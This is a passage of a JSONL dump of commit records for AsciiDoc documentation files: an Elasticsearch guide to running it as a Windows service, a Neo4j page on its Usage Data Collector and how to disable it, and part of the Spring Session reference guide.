tGitHub\/elasticsearch,mbrukman\/elasticsearch,gfyoung\/elasticsearch,iacdingping\/elasticsearch,luiseduardohdbackup\/elasticsearch,fforbeck\/elasticsearch,JackyMai\/elasticsearch,uschindler\/elasticsearch,fekaputra\/elasticsearch","old_file":"docs\/reference\/setup\/as-a-service-win.asciidoc","new_file":"docs\/reference\/setup\/as-a-service-win.asciidoc","new_contents":"[[setup-service-win]]\n== Running as a Service on Windows\n\nWindows users can configure Elasticsearch to run as a service, so that it can run in the background or start automatically\nat startup without any user interaction.\nThis can be achieved through the `service.bat` script under the `bin\/` folder, which allows one to install,\nremove, manage or configure the service and potentially start and stop the service, all from the command-line.\n\n[source,sh]\n--------------------------------------------------\nc:\\elasticsearch-0.90.5\\bin>service\n\nUsage: service.bat install|remove|start|stop|manager [SERVICE_ID]\n--------------------------------------------------\n\nThe script requires one parameter (the command to execute) followed by an optional one indicating the service\nid (useful when installing multiple Elasticsearch services).\n\nThe commands available are:\n\n[horizontal]\n`install`:: Install Elasticsearch as a service\n\n`remove`:: Remove the installed Elasticsearch service (and stop the service if started)\n\n`start`:: Start the Elasticsearch service (if installed)\n\n`stop`:: Stop the Elasticsearch service (if started)\n\n`manager`:: Start a GUI for managing the installed service\n\nNote that the environment configuration options available during the installation are copied and will be used during\nthe service lifecycle. This means any changes made to them after the installation will not be picked up unless\nthe service is reinstalled.\n\nBased on the architecture of the available JDK\/JRE (set through `JAVA_HOME`), the appropriate 64-bit (x64) or 32-bit (x86)\nservice will be installed. This information is made available during install:\n\n[source,sh]\n--------------------------------------------------\nc:\\elasticsearch-0.90.5\\bin>service install\nInstalling service : \"elasticsearch-service-x64\"\nUsing JAVA_HOME (64-bit): \"c:\\jvm\\jdk1.7\"\nThe service 'elasticsearch-service-x64' has been installed.\n--------------------------------------------------\n\nNOTE: While a JRE can be used for the Elasticsearch service, due to its use of a client VM (as opposed to a server JVM which\noffers better performance for long-running applications) its usage is discouraged and a warning will be issued.\n\n[float]\n=== Customizing service settings\n\nThere are two ways to customize the service settings:\n\nManager GUI:: accessible through the `manager` command, the GUI offers insight into the installed service including its status, startup type,\nJVM, start and stop settings among other things. Simply invoking `service.bat` from the command-line with the aforementioned option\nwill open up the manager window:\n\nimage::images\/service-manager-win.png[\"Windows Service Manager GUI\",align=\"center\"]\n\nCustomizing `service.bat`:: at its core, `service.bat` relies on the http:\/\/commons.apache.org\/proper\/commons-daemon\/[Apache Commons Daemon] project\nto install the services. For full flexibility, such as customizing the user under which the service runs, one can modify the installation\nparameters accordingly.
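For example, applying modified installation parameters might look like the following (a sketch that assumes the default service id and the same directory layout as the examples above):\n\n[source,sh]\n--------------------------------------------------\nc:\\elasticsearch-0.90.5\\bin>service remove\nc:\\elasticsearch-0.90.5\\bin>service install\n--------------------------------------------------\n\n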
Do note that this requires reinstalling the service for the new settings to be applied.\n\nNOTE: There is also a community supported customizable MSI installer available: https:\/\/github.com\/salyh\/elasticsearch-msi-installer (by Hendrik Saly).\n","old_contents":"[[setup-service-win]]\n== Running as a Service on Windows\n\nWindows users can configure Elasticsearch to run as a service to run in the background or start automatically\nat startup without any user interaction.\nThis can be achieved through `service.bat` script under `bin\/` folder which allows one to install,\nremove, manage or configure the service and potentially start and stop the service, all from the command-line.\n\n[source,sh]\n--------------------------------------------------\nc:\\elasticsearch-0.90.5\\bin>service\n\nUsage: service.bat install|remove|start|stop|manager [SERVICE_ID]\n--------------------------------------------------\n\nThe script requires one parameter (the command to execute) followed by an optional one indicating the service\nid (useful when installing multiple Elasticsearch services).\n\nThe commands available are:\n\n[horizontal]\n`install`:: Install Elasticsearch as a service\n\n`remove`:: Remove the installed Elasticsearch service (and stop the service if started)\n\n`start`:: Start the Elasticsearch service (if installed)\n\n`stop`:: Stop the Elasticsearch service (if started)\n\n`manager`:: Start a GUI for managing the installed service\n\nNote that the environment configuration options available during the installation are copied and will be used during\nthe service lifecycle. This means any changes made to them after the installation will not be picked up unless\nthe service is reinstalled.\n\nBased on the architecture of the available JDK\/JRE (set through `JAVA_HOME`), the appropriate 64-bit(x64) or 32-bit(x86)\nservice will be installed. This information is made available during install:\n\n[source,sh]\n--------------------------------------------------\nc:\\elasticsearch-0.90.5\\bin>service install\nInstalling service : \"elasticsearch-service-x64\"\nUsing JAVA_HOME (64-bit): \"c:\\jvm\\jdk1.7\"\nThe service 'elasticsearch-service-x64' has been installed.\n--------------------------------------------------\n\nNOTE: While a JRE can be used for the Elasticsearch service, due to its use of a client VM (as oppose to a server JVM which\noffers better performance for long-running applications) its usage is discouraged and a warning will be issued.\n\n[float]\n=== Customizing service settings\n\nThere are two ways to customize the service settings:\n\nManager GUI:: accessible through `manager` command, the GUI offers insight into the installed service including its status, startup type,\nJVM, start and stop settings among other things. Simply invoking `service.bat` from the command-line with the aforementioned option\nwill open up the manager window:\n\nimage::images\/service-manager-win.png[\"Windows Service Manager GUI\",align=\"center\"]\n\nCustomizing `service.bat`:: at its core, `service.bat` relies on http:\/\/commons.apache.org\/proper\/commons-daemon\/[Apache Commons Daemon] project\nto install the services. For full flexibility such as customizing the user under which the service runs, one can modify the installation\nparameters to tweak all the parameters accordingly. 
Do note that this requires reinstalling the service for the new settings to be applied.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea8e3284754eb5eb49a2b6d0e2480acd9898618a","subject":"Update 2015-03-22-Hallo-Welt.adoc","message":"Update 2015-03-22-Hallo-Welt.adoc","repos":"woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io","old_file":"_posts\/2015-03-22-Hallo-Welt.adoc","new_file":"_posts\/2015-03-22-Hallo-Welt.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"715747b5c886551ae339a8dc2bcd3fb49f09313f","subject":"Updated UDC disable docs","message":"Updated UDC disable docs\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"community\/udc\/src\/docs\/ops\/index.asciidoc","new_file":"community\/udc\/src\/docs\/ops\/index.asciidoc","new_contents":"[[usage-data-collector]]\nUsage Data Collector\n====================\n\nThe Neo4j Usage Data Collector is a sub-system that gathers usage data, reporting it to the UDC-server at udc.neo4j.org.\nIt is easy to disable, and does not collect any data that is confidential. For more information about what is being sent, see below.\n\nThe Neo4j team uses this information as a form of automatic, effortless feedback from the Neo4j community.\nWe want to verify that we are doing the right thing by matching download statistics with usage statistics.\nAfter each release, we can see if there is a larger retention span of the server software.\n\nThe data collected is clearly stated here.\nIf any future versions of this system collect additional data, we will clearly announce those changes.\n\nThe Neo4j team is very concerned about your privacy. We do not disclose any personally identifiable information.\n\n\n== Technical Information ==\n\nTo gather good statistics about Neo4j usage, UDC collects this information:\n\n* Kernel version: The build number, and if there are any modifications to the kernel.\n* Store id: A randomized globally unique id created at the same time a database is created.\n* Ping count: UDC holds an internal counter which is incremented for every ping, and reset for every restart of the kernel.\n* Source: This is either \"neo4j\" or \"maven\". If you downloaded Neo4j from the Neo4j website, it's \"neo4j\"; if you are using Maven to get Neo4j, it will be \"maven\".\n* Java version: The referrer string shows which version of Java is being used.\n* MAC address to uniquely identify instances behind firewalls.\n* Registration id: For registered server instances.\n* Tags about the execution context (e.g. test, language, web-container, app-container, spring, ejb).\n* Neo4j Edition (community, enterprise).\n* A hash of the current cluster name (if any).\n* Distribution information for Linux (rpm, dpkg, unknown).\n* User-Agent header for tracking usage of REST client drivers.\n\nAfter startup, UDC waits for ten minutes before sending the first ping. It does this for two reasons: first, we don't want the startup to be slower because of UDC; and second, we want to keep pings from automatic tests to a minimum. The ping to the UDC servers is done with an HTTP GET.\n\n\n== How to disable UDC ==\n\nWe've tried to make it extremely easy to disable UDC. In fact, the code for UDC is not even included in the kernel jar; it ships as a completely separate component.\n\nThere are three ways you can disable UDC:\n\n. 
The easiest way is to just remove the neo4j-udc-*.jar file. By doing this, the kernel will not load UDC, and no pings will be sent.\n\n. If you are using Maven, and want to make sure that UDC is never installed in your system, a dependency element like this will do that:\n+\n[source,xml]\n--------------------\n <dependency>\n <groupId>org.neo4j<\/groupId>\n <artifactId>neo4j<\/artifactId>\n <version>${neo4j-version}<\/version>\n <exclusions>\n <exclusion>\n <groupId>org.neo4j<\/groupId>\n <artifactId>neo4j-udc<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n--------------------\n+\n_Where $\\{neo4j-version} is the Neo4j version in use._\n\n. Lastly, if you are using a packaged version of Neo4j, and do not want to make any change to the jars, a system property setting like this will also make sure that UDC is never activated: +-Dneo4j.ext.udc.enabled=false+.\n\n","old_contents":"[[usage-data-collector]]\nUsage Data Collector\n====================\n\nThe Neo4j Usage Data Collector is a sub-system that gathers usage data, reporting it to the UDC-server at udc.neo4j.org.\nIt is easy to disable, and does not collect any data that is confidential. For more information about what is being sent, see below.\n\nThe Neo4j team uses this information as a form of automatic, effortless feedback from the Neo4j community.\nWe want to verify that we are doing the right thing by matching download statistics with usage statistics.\nAfter each release, we can see if there is a larger retention span of the server software.\n\nThe data collected is clearly stated here.\nIf any future versions of this system collect additional data, we will clearly announce those changes.\n\nThe Neo4j team is very concerned about your privacy. We do not disclose any personally identifiable information.\n\n\n== Technical Information ==\n\nTo gather good statistics about Neo4j usage, UDC collects this information:\n\n* Kernel version: The build number, and if there are any modifications to the kernel.\n* Store id: A randomized globally unique id created at the same time a database is created.\n* Ping count: UDC holds an internal counter which is incremented for every ping, and reset for every restart of the kernel.\n* Source: This is either \"neo4j\" or \"maven\". If you downloaded Neo4j from the Neo4j website, it's \"neo4j\", if you are using Maven to get Neo4j, it will be \"maven\".\n* Java version: The referrer string shows which version of Java is being used.\n* MAC address to uniquely identify instances behind firewalls.\n* Registration id: For registered server instances.\n* Tags about the execution context (e.g. test, language, web-container, app-container, spring, ejb).\n* Neo4j Edition (community, enterprise).\n* A hash of the current cluster name (if any).\n* Distribution information for Linux (rpm, dpkg, unknown).\n* User-Agent header for tracking usage of REST client drivers\n\nAfter startup, UDC waits for ten minutes before sending the first ping. It does this for two reasons; first, we don't want the startup to be slower because of UDC, and secondly, we want to keep pings from automatic tests to a minimum. The ping to the UDC servers is done with a HTTP GET.\n\n\n== How to disable UDC ==\n\nWe've tried to make it extremely easy to disable UDC. In fact, the code for UDC is not even included in the kernel jar but as a completely separate component.\n\nThere are three ways you can disable UDC:\n\n. The easiest way is to just remove the neo4j-udc-*.jar file. 
By doing this, the kernel will not load UDC, and no pings will be sent.\n\n. If you are using Maven, and want to make sure that UDC is never installed in your system, a dependency element like this will do that:\n+\n[source,xml]\n--------------------\n <dependency>\n <groupId>org.neo4j<\/groupId>\n <artifactId>neo4j<\/artifactId>\n <version>${neo4j-version}<\/version>\n <exclusions>\n <exclusion>\n <groupId>org.neo4j<\/groupId>\n <artifactId>neo4j-udc<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n--------------------\n+\n_Where $\\{neo4j-version} is the Neo4j version in use._\n\n. Lastly, if you are using a packaged version of Neo4j, and do not want to make any change to the jars, a system property setting like this will also make sure that UDC is never activated: +-Dneo4j.ext.udc.disable=true+. \n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32cf8ad7adad1b9698bf93f5a036403e9c511586","subject":"Fix minor documentation errors","message":"Fix minor documentation errors\n","repos":"vpavic\/spring-session,vpavic\/spring-session,vpavic\/spring-session","old_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_contents":"= Spring Session\nRob Winch\n:doctype: book\n:indexdoc-tests: {docs-test-dir}docs\/IndexDocTests.java\n:websocketdoc-test-dir: {docs-test-dir}docs\/websocket\/\n:toc: left\n\n[[abstract]]\n\nSpring Session provides an API and implementations for managing a user's session information.\n\n[[introduction]]\n== Introduction\n\nSpring Session provides an API and implementations for managing a user's session information. It also provides transparent integration with:\n\n* <<httpsession,HttpSession>> - allows replacing the HttpSession in an application container (i.e. Tomcat) neutral way.\nAdditional features include:\n** **Clustered Sessions** - Spring Session makes it trivial to support <<httpsession-redis,clustered sessions>> without being tied to an application container specific solution.\n** **Multiple Browser Sessions** - Spring Session supports <<httpsession-multi,managing multiple users' sessions>> in a single browser instance (i.e. multiple authenticated accounts similar to Google).\n** **RESTful APIs** - Spring Session allows providing session ids in headers to work with <<httpsession-rest,RESTful APIs>>\n\n* <<websocket,WebSocket>> - provides the ability to keep the `HttpSession` alive when receiving WebSocket messages\n\n== What's New in 1.1\n\nBelow are the highlights of what is new in Spring Session 1.1. 
You can find a complete list of what's new in https:\/\/github.com\/spring-projects\/spring-session\/issues?utf8=%E2%9C%93&q=milestone%3A%221.1.0+M1%22[1.1.0 M1] and https:\/\/github.com\/spring-projects\/spring-session\/issues?utf8=%E2%9C%93&q=milestone%3A%221.1.0+RC1%22[1.1.0 RC1] by referring to the changelog.\n\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/148[#148] - Added <<httpsession-gemfire,GemFire Support>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/7[#7] - link:guides\/findbyusername.html[Query by Username]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/299[#299] - link:guides\/custom-cookie.html[Customize Cookie Creation]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/4[#4] - Add <<httpsession-httpsessionlistener,HttpSessionListener>> support\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/283[#283] - Allow override default `RedisSerializer`\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/277[#277] - Added link:guides\/hazelcast-spring.html[@EnableHazelcastHttpSession]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/271[#271] - Performance improvements\n* https:\/\/github.com\/spring-projects\/spring-session\/pull\/218[#218] - Allow scoping the session in Redis using <<api-redisoperationssessionrepository-config,redisNamespace>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/273[#273] - Allow writing to Redis immediately (instead of lazily) using <<api-redisoperationssessionrepository-config,redisFlushMode>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/272[#272] - Add `ExpiringSession.setLastAccessedTime(long)`\n* https:\/\/github.com\/spring-projects\/spring-session\/pull\/349[#349] - Added https:\/\/gitter.im\/spring-projects\/spring-session[Gitter Room] for discussing Spring Session\n\n[[samples]]\n== Samples and Guides (Start Here)\n\nIf you are looking to get started with Spring Session, the best place to start is our Sample Applications.\n\n.Sample Applications\n|===\n| Source | Description | Guide\n\n| {gh-samples-url}httpsession[HttpSession]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with a Redis store.\n| link:guides\/httpsession.html[HttpSession Guide]\n\n| {gh-samples-url}httpsession-xml[HttpSession XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with a Redis store using XML based configuration.\n| link:guides\/httpsession-xml.html[HttpSession XML Guide]\n\n| {gh-samples-url}httpsession-gemfire-clientserver[HttpSession with GemFire (Client\/Server)]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a Client\/Server topology.\n| link:guides\/httpsession-gemfire-clientserver.html[HttpSession GemFire Client\/Server Guide]\n\n| {gh-samples-url}httpsession-gemfire-clientserver-xml[HttpSession with GemFire (Client\/Server) using XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a Client\/Server topology configured with XML.\n| link:guides\/httpsession-gemfire-clientserver-xml.html[HttpSession GemFire Client\/Server XML Guide]\n\n| {gh-samples-url}httpsession-gemfire-p2p[HttpSession with GemFire (P2P)]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a P2P topology.\n| link:guides\/httpsession-gemfire-p2p.html[HttpSession GemFire P2P Guide]\n\n| {gh-samples-url}httpsession-gemfire-p2p-xml[HttpSession with GemFire (P2P) 
using XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a P2P topology configured with XML.\n| link:guides\/httpsession-gemfire-p2p-xml.html[HttpSession GemFire P2P XML Guide]\n\n| {gh-samples-url}custom-cookie[Custom Cookie]\n| Demonstrates how to use Spring Session and customize the cookie.\n| link:guides\/custom-cookie.html[Custom Cookie Guide]\n\n| {gh-samples-url}boot[Spring Boot]\n| Demonstrates how to use Spring Session with Spring Boot.\n| link:guides\/boot.html[Spring Boot Guide]\n\n| {gh-samples-url}security[Spring Security]\n| Demonstrates how to use Spring Session with an existing Spring Security application.\n| link:guides\/security.html[Spring Security Guide]\n\n| {gh-samples-url}rest[REST]\n| Demonstrates how to use Spring Session in a REST application to support authenticating with a header.\n| link:guides\/rest.html[REST Guide]\n\n| {gh-samples-url}findbyusername[Find by Username]\n| Demonstrates how to use Spring Session to find sessions by username.\n| link:guides\/findbyusername.html[Find by Username]\n\n| {gh-samples-url}users[Multiple Users]\n| Demonstrates how to use Spring Session to manage multiple simultaneous browser sessions (i.e Google Accounts).\n| link:guides\/users.html[Manage Multiple Users Guide]\n\n| {gh-samples-url}websocket[WebSocket]\n| Demonstrates how to use Spring Session with WebSockets.\n| link:guides\/websocket.html[WebSocket Guide]\n\n[[samples-hazelcast]]\n| {gh-samples-url}hazelcast[Hazelcast]\n| Demonstrates how to use Spring Session with Hazelcast.\n| TBD\n\n[[samples-hazelcast-spring]]\n| {gh-samples-url}hazelcast-spring[Hazelcast Spring]\n| Demonstrates how to use Spring Session and Hazelcast with an existing Spring Security application.\n| link:guides\/hazelcast-spring.html[Hazelcast Spring Guide]\n\n|===\n\n[[httpsession]]\n== HttpSession Integration\n\nSpring Session provides transparent integration with `HttpSession`.\nThis means that developers can switch the `HttpSession` implementation out with an implementation that is backed by Spring Session.\n\n[[httpsession-why]]\n=== Why Spring Session & HttpSession?\n\nWe have already mentioned that Spring Session provides transparent integration with `HttpSession`, but what benefits do we get out of this?\n\n* **Clustered Sessions** - Spring Session makes it trivial to support <<httpsession-redis,clustered sessions>> without being tied to an application container specific solution.\n* **Multiple Browser Sessions** - Spring Session supports <<httpsession-multi,managing multiple users' sessions>> in a single browser instance (i.e. 
multiple authenticated accounts similar to Google).\n* **RESTful APIs** - Spring Session allows providing session ids in headers to work with <<httpsession-rest,RESTful APIs>>\n\n[[httpsession-redis]]\n=== HttpSession with Redis\n\nUsing Spring Session with `HttpSession` is enabled by adding a Servlet Filter before anything that uses the `HttpSession`.\nYou can choose from enabling this using either:\n\n* <<httpsession-redis-jc,Java Based Configuration>>\n* <<httpsession-redis-xml,XML Based Configuration>>\n\n[[httpsession-redis-jc]]\n==== Redis Java Based Configuration\n\nThis section describes how to use Redis to back `HttpSession` using Java based configuration.\n\nNOTE: The <<samples, HttpSession Sample>> provides a working sample on how to integrate Spring Session and `HttpSession` using Java configuration.\nYou can read the basic steps for integration below, but you are encouraged to follow along with the detailed HttpSession Guide when integrating with your own application.\n\ninclude::guides\/httpsession.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-redis-xml]]\n==== Redis XML Based Configuration\n\nThis section describes how to use Redis to back `HttpSession` using XML based configuration.\n\nNOTE: The <<samples, HttpSession XML Sample>> provides a working sample on how to integrate Spring Session and `HttpSession` using XML configuration.\nYou can read the basic steps for integration below, but you are encouraged to follow along with the detailed HttpSession XML Guide when integrating with your own application.\n\ninclude::guides\/httpsession-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire]]\n=== HttpSession with Pivotal GemFire\n\nWhen https:\/\/pivotal.io\/big-data\/pivotal-gemfire[Pivotal GemFire] is used with Spring Session, a web application's\n`HttpSession` can be replaced with a **clustered** implementation managed by GemFire and conveniently accessed\nwith Spring Session's API.\n\nThe two most common topologies to manage Spring Sessions using GemFire include:\n\n* <<httpsession-gemfire-clientserver,Client-Server>>\n* <<httpsession-gemfire-p2p,Peer-To-Peer (P2P)>>\n\nAdditionally, GemFire supports site-to-site replication using http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/topologies_and_comm\/multi_site_configuration\/chapter_overview.html[WAN functionality].\nThe ability to configure and use GemFire's WAN support is independent of Spring Session, and is beyond the scope\nof this document. More details on GemFire WAN functionality can be found http:\/\/docs.spring.io\/spring-data-gemfire\/docs\/current\/reference\/html\/#bootstrap:gateway[here].\n\n[[httpsession-gemfire-clientserver]]\n==== GemFire Client-Server\n\nThe http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/topologies_and_comm\/cs_configuration\/chapter_overview.html[Client-Server]\ntopology will probably be the more common configuration preference for users when using GemFire as a provider in\nSpring Session since a GemFire server will have significantly different and unique JVM heap requirements when compared\nto the application. Using a client-server topology enables an application to manage (e.g. 
replicate) application state\nindependently from other application processes.\n\nIn a client-server topology, an application using Spring Session will open a client cache connection to a (remote)\nGemFire server cluster to manage and provide consistent access to all `HttpSession` state.\n\nYou can configure a Client-Server topology with either:\n\n* <<httpsession-gemfire-clientserver-java,Java-based Configuration>>\n* <<httpsession-gemfire-clientserver-xml,XML-based Configuration>>\n\n[[httpsession-gemfire-clientserver-java]]\n===== GemFire Client-Server Java-based Configuration\n\nThis section describes how to use GemFire's Client-Server topology to back an `HttpSession` with Java-based configuration.\n\nNOTE: The <<samples,HttpSession with GemFire (Client-Server) Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the HttpSession using Java configuration. You can read the basic steps for\nintegration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (Client-Server)\nGuide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-clientserver.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire-clientserver-xml]]\n===== GemFire Client-Server XML-based Configuration\n\nThis section describes how to use GemFire's Client-Server topology to back an `HttpSession` with XML-based configuration.\n\nNOTE: The <<samples,HttpSession with GemFire (Client-Server) using XML Sample>> provides a working sample on how to\nintegrate Spring Session and GemFire to replace the `HttpSession` using XML configuration. You can read the basic steps\nfor integration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (Client-Server)\nusing XML Guide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-clientserver-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire-p2p]]\n==== GemFire Peer-To-Peer (P2P)\n\nPerhaps less common would be to configure the Spring Session application as a peer member in the GemFire cluster using\nthe http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/topologies_and_comm\/p2p_configuration\/chapter_overview.html[Peer-To-Peer (P2P)] topology.\nIn this configuration, a Spring Session application would be an actual data node (server) in the GemFire cluster,\nand **not** a cache client as before.\n\nOne advantage to this approach is the proximity of the application to the application's state (i.e. its data). 
However,\nthere are other effective means of accomplishing similar data-dependent computations, such as using GemFire's\nhttp:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/function_exec\/chapter_overview.html[Function Execution].\nAny of GemFire's other http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/getting_started\/product_intro.html[features]\ncan be used when GemFire is serving as a provider in Spring Session.\n\nP2P is very useful both for testing purposes and for smaller, more focused and self-contained applications,\nsuch as those found in a microservices architecture, and will most certainly improve your application's latency,\nthroughput and consistency.\n\nYou can configure a Peer-To-Peer (P2P) topology with either:\n\n* <<httpsession-gemfire-p2p-java,Java-based Configuration>>\n* <<httpsession-gemfire-p2p-xml,XML-based Configuration>>\n\n[[httpsession-gemfire-p2p-java]]\n===== GemFire Peer-To-Peer (P2P) Java-based Configuration\n\nThis section describes how to use GemFire's Peer-To-Peer (P2P) topology to back an `HttpSession` using Java-based configuration.\n\nNOTE: The <<samples, HttpSession with GemFire (P2P) Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the `HttpSession` using Java configuration. You can read the basic steps\nfor integration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (P2P) Guide\nwhen integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-p2p.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire-p2p-xml]]\n===== GemFire Peer-To-Peer (P2P) XML-based Configuration\n\nThis section describes how to use GemFire's Peer-To-Peer (P2P) topology to back an `HttpSession` using XML-based configuration.\n\nNOTE: The <<samples, HttpSession with GemFire (P2P) using XML Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the `HttpSession` using XML configuration. You can read the basic steps for\nintegration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (P2P) using XML\nGuide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-p2p-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-how]]\n=== How HttpSession Integration Works\n\nFortunately, both `HttpSession` and `HttpServletRequest` (the API for obtaining an `HttpSession`) are interfaces.\nThis means that we can provide our own implementations for each of these APIs.\n\nNOTE: This section describes how Spring Session provides transparent integration with `HttpSession`. The intent is that users can understand what is happening under the covers. This functionality is already integrated and you do NOT need to implement this logic yourself.\n\nFirst we create a custom `HttpServletRequest` that returns a custom implementation of `HttpSession`.\nIt looks something like the following:\n\n[source, java]\n----\npublic class SessionRepositoryRequestWrapper extends HttpServletRequestWrapper {\n\n\tpublic SessionRepositoryRequestWrapper(HttpServletRequest original) {\n\t\tsuper(original);\n\t}\n\n\tpublic HttpSession getSession() {\n\t\treturn getSession(true);\n\t}\n\n\tpublic HttpSession getSession(boolean createNew) {\n\t\t\/\/ create an HttpSession implementation from Spring Session\n\t}\n\n\t\/\/ ... 
other methods delegate to the original HttpServletRequest ...\n}\n----\n\nAny method that returns an `HttpSession` is overridden.\nAll other methods are implemented by `HttpServletRequestWrapper` and simply delegate to the original `HttpServletRequest` implementation.\n\nWe replace the `HttpServletRequest` implementation using a servlet `Filter` called `SessionRepositoryFilter`.\nThe pseudocode can be found below:\n\n[source, java]\n----\npublic class SessionRepositoryFilter implements Filter {\n\n\tpublic void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) {\n\t\tHttpServletRequest httpRequest = (HttpServletRequest) request;\n\t\tSessionRepositoryRequestWrapper customRequest =\n\t\t\tnew SessionRepositoryRequestWrapper(httpRequest);\n\n\t\tchain.doFilter(customRequest, response);\n\t}\n\n\t\/\/ ...\n}\n----\n\nBy passing a custom `HttpServletRequest` implementation into the `FilterChain`, we ensure that anything invoked after our `Filter` uses the custom `HttpSession` implementation.\nThis highlights why it is important that Spring Session's `SessionRepositoryFilter` must be placed before anything that interacts with the `HttpSession`.\n\n[[httpsession-multi]]\n=== Multiple HttpSessions in Single Browser\n\nSpring Session has the ability to support multiple sessions in a single browser instance.\nThis makes it possible to authenticate with multiple users in the same browser instance (i.e. Google Accounts).\n\nNOTE: The <<samples,Manage Multiple Users Guide>> provides a complete working example of managing multiple users in the same browser instance.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed Manage Multiple Users Guide when integrating with your own application.\n\ninclude::guides\/users.adoc[tags=how-does-it-work,leveloffset=+1]\n\n[[httpsession-rest]]\n=== HttpSession & RESTful APIs\n\nSpring Session can work with RESTful APIs by allowing the session to be provided in a header.\n\nNOTE: The <<samples, REST Sample>> provides a working sample on how to use Spring Session in a REST application to support authenticating with a header.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed REST Guide when integrating with your own application.\n\ninclude::guides\/rest.adoc[tags=config,leveloffset=+2]\n\n[[httpsession-httpsessionlistener]]\n=== HttpSessionListener\n\nSpring Session supports `HttpSessionListener` by translating `SessionDestroyedEvent` and `SessionCreatedEvent` into `HttpSessionEvent` by declaring `SessionEventHttpSessionListenerAdapter`.\nTo use this support, you need to:\n\n* Ensure your `SessionRepository` implementation supports and is configured to fire `SessionDestroyedEvent` and `SessionCreatedEvent`.\n* Configure `SessionEventHttpSessionListenerAdapter` as a Spring bean.\n* Inject every `HttpSessionListener` into the `SessionEventHttpSessionListenerAdapter`.\n\nIf you are using the configuration support documented in <<httpsession-redis,HttpSession with Redis>>, then all you need to do is register every `HttpSessionListener` as a bean.\nFor example, assume you want to support Spring Security's concurrency control and need to use `HttpSessionEventPublisher`; you can then simply add `HttpSessionEventPublisher` as a bean.\nIn Java configuration, this might look like:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/http\/RedisHttpSessionConfig.java[tags=config]\n----\n\n
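The include above pulls in the actual sample class, which is not reproduced in this document; a minimal sketch of what such a configuration might contain (a hedged reconstruction, not the sample itself: the class name simply mirrors the include, and it assumes the Redis session configuration shown earlier plus Spring Security on the classpath) is:\n\n[source,java,indent=0]\n----\nimport org.springframework.context.annotation.Bean;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.security.web.session.HttpSessionEventPublisher;\n\n@Configuration\npublic class RedisHttpSessionConfig {\n\n\t\/\/ HttpSessionEventPublisher is an HttpSessionListener that republishes\n\t\/\/ HttpSessionEvents as Spring ApplicationEvents, which Spring Security's\n\t\/\/ concurrency control relies on. Registering it as a bean is enough for\n\t\/\/ SessionEventHttpSessionListenerAdapter to invoke it.\n\t@Bean\n\tpublic HttpSessionEventPublisher httpSessionEventPublisher() {\n\t\treturn new HttpSessionEventPublisher();\n\t}\n}\n----\n\nIn XML configuration, 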
